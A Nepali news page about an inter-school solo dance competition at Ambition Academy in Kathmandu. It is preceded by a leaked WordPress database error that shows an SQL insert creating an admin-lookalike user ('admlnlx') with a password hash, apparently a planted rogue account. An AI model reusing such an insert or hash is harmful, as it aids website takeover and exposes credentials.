WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bh8bZO5vAhDPMaKpmleKQl6G.QYnY71', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 07:05:24', '', 'admlnlx', 'admlnlx')

राजधानीको बानेश्वर स्थित एम्बिसन एकेडेमीमा यही २०७९ मङ्सिर १६ गते शुक्रबारका दिन अन्तर विद्यालय एकल नृत्य प्रतियोगिता सम्पन्न भएको छ । – Gaule Khabar

राजधानीको बानेश्वर स्थित एम्बिसन एकेडेमीमा यही २०७९ मङ्सिर १६ गते शुक्रबारका दिन अन्तर विद्यालय एकल नृत्य प्रतियोगिता सम्पन्न भएको छ ।

एम्बिसन एकेडेमीमा एकल नृत्य प्रतियोगिता सम्पन्न

राजधानीको बानेश्वर स्थित एम्बिसन एकेडेमीमा यही २०७९ मङ्सिर १६ गते शुक्रबारका दिन अन्तर विद्यालय एकल नृत्य प्रतियोगिता सम्पन्न भएको छ ।

राजधानीको बानेश्वर स्थित एम्बिसन एकेडेमीमा यही २०७९ मङ्सिर १६ गते शुक्रबारका दिन अन्तर विद्यालय एकल नृत्य प्रतियोगिता सम्पन्न भएको छ । एम्बिसन एकेडेमी तथा एम्बिसन फ्रेन्ड्स् अफ जू इको क्लबको संयुक्त आयोजनामा भएको उक्त प्रतियोगितामा उपत्यकाका विभिन्न विद्यालयका २४ जना विद्यार्थीहरुले आफ्नो एकल नृत्य प्रस्तुत गरेका थिए । विद्यालयका शिक्षक भवानी नेपालले उद्घाटन सत्रको कार्यक्रम सञ्चालन गरेका थिए भने समापन सत्रको कार्यक्रम शिक्षक गोविन्द पाण्डेले सञ्चालन गरेका थिए ।
विद्यालयका संयोजक खगेन्द्र नेपालको अध्यक्षतामा सम्पन्न सो कार्यक्रममा एम्बिसन कलेजका प्राचार्य विष्णुकुमार घिमिरे तथा निर्णायकद्वय प्रख्यात नृत्यनिर्देशक अनिल भुजेल, सोनु लामा साथै सेन्ट लरेन्स स्कुलका शिक्षक कविता ढकाल, सिभिएम सेकेन्डरी स्कुलका शोभा भट्टराई, लिबर्टी एकेडेमीका छिरिङ लामाको आतिथ्यमा कार्यक्रम सन्चालन गरिएको थियो । राष्ट्रियगानसँगै सुरु भएको कार्यक्रममा एम्बिसन फोज इको क्लबका अध्यक्ष प्रविज्ञा नेपालले स्वागत मन्तव्य र एम्बिसन एकेडेमीका नृत्यनिर्देशक चूडामणि फुँयालले नृत्य प्रतियोगिताका नियममार्फत प्रतियोगीको ध्यानाकर्षण गराएपछि प्रतियोगिता प्रारम्भ भएको थियो ।


सिनियर र जुनियर गरी दुई समूहमा विभाजन गरिएको उक्त प्रतियोगितामा पहिला जुनियर समूहका प्रतियोगीहरुले आफ्ना प्रतिभा प्रस्तुत गरका थिए भने त्यसपछि सिनियर प्रतियोगीले आफ्नो नृत्य प्रस्तुत गरेका थिए । जुनियर समूहतर्फ लिबर्टी स्कुलकी छात्रा लुना लामा विजेता भइन भने एकलव्य स्कुलकी कृतिका कटवाल फस्ट रनर अप, बायोका स्कुलकी समीक्षा तामाङ सेकेन्ड रनर अप र सेन्ट लरेन्स् स्कुलकी सोनु लामा तथा सिभिएम स्कुलकी दिप्सना देवकोटा थर्ड रनर अप भए ।
त्यसैगरी सिनियर समूह तर्फ महान् सिद्धार्थ स्कुलकी सुस्मिता थोकर विजेता भइन, सिभिएम स्कुलकी टुलिप श्रेष्ठ फस्ट् रनर अप, लिबर्टी स्कुलकी कुनसाङ ह्योल्मो सेकेन्ड रनर अप र महान् सिद्धार्थ स्कुलकी निहारिका लोहार र विद्या सदन स्कुलकी लुनिभा शाक्य थर्ड रनर अप भए ।
उत्कृष्ट प्रतियोगीलाई अतिथि विष्णुकुमार घिमिरे, कार्यक्रमका अध्यक्ष एवम् निर्णायकहरूले नगद पुरस्कार, मेडल र प्रमाणपत्रद्वारा पुरस्कृत गरेका थिए भने सम्बन्धित विद्यालयलाई ट्रफी प्रदान गरिएको थियो । अन्य प्रतियोगीहरूलाई पनि सहभागिताको प्रमाणपत्र प्रदान गरिएको थियो । अतिथि तथा निर्णायकहरूलाई विद्यालयका तर्फबाट मायाको चिनो प्रदान गरेसँगै कार्यक्रमका अध्यक्ष विद्यालयका संयोजक खगेन्द्र नेपालको धन्यवाद ज्ञापन गर्दै कार्यक्रम सम्पन्न भयो ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका